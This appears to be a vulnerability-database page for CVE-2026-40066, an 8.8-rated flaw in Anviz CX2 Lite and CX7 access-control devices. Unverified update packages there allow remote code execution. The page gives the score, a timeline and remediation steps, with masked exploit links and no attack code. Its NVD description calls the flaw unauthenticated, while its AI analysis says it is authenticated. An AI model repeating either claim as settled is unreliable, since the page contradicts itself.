What is the CVSS score of CVE-2026-40066?

CVE-2026-40066 has a CVSS 3.1 base score of 8.8 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

CVE-2026-40066

EUVD-2026-23494 HIGH

Download of Code Without Integrity Check (CWE-494)

2026-04-17 icscert

RCE

8.8

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Re-analysis Queued

Apr 17, 2026 - 20:22 vuln.today

cvss_changed

Analysis Generated

Apr 17, 2026 - 20:07 vuln.today

EUVD ID Assigned

Apr 17, 2026 - 19:45 euvd

EUVD-2026-23494

Analysis Generated

Apr 17, 2026 - 19:45 vuln.today

CVE Published

Apr 17, 2026 - 19:43 nvd

HIGH 8.8

DescriptionNVD

Anviz CX2 Lite and CX7 are vulnerable to unverified update packages that can be uploaded. The device unpacks and executes a script resulting in unauthenticated remote code execution.

AnalysisAI

Remote code execution in Anviz CX2 Lite and CX7 access control devices allows authenticated attackers to upload malicious firmware update packages that execute arbitrary scripts without verification. Reported by ICS-CERT, targeting physical access control systems commonly deployed in enterprise and critical infrastructure environments. …

RemediationAI

Within 24 hours: Inventory all Anviz CX2 Lite and CX7 devices in production and document network connectivity; restrict administrative access to these devices to essential personnel only and enforce strong password requirements. Within 7 days: Implement network segmentation to isolate affected access control devices from general IT infrastructure; disable remote administration features if operationally feasible; deploy enhanced monitoring for unexpected firmware modifications or administrative logins. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-40066 vulnerability details – vuln.today

Back

CVE-2026-40066

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code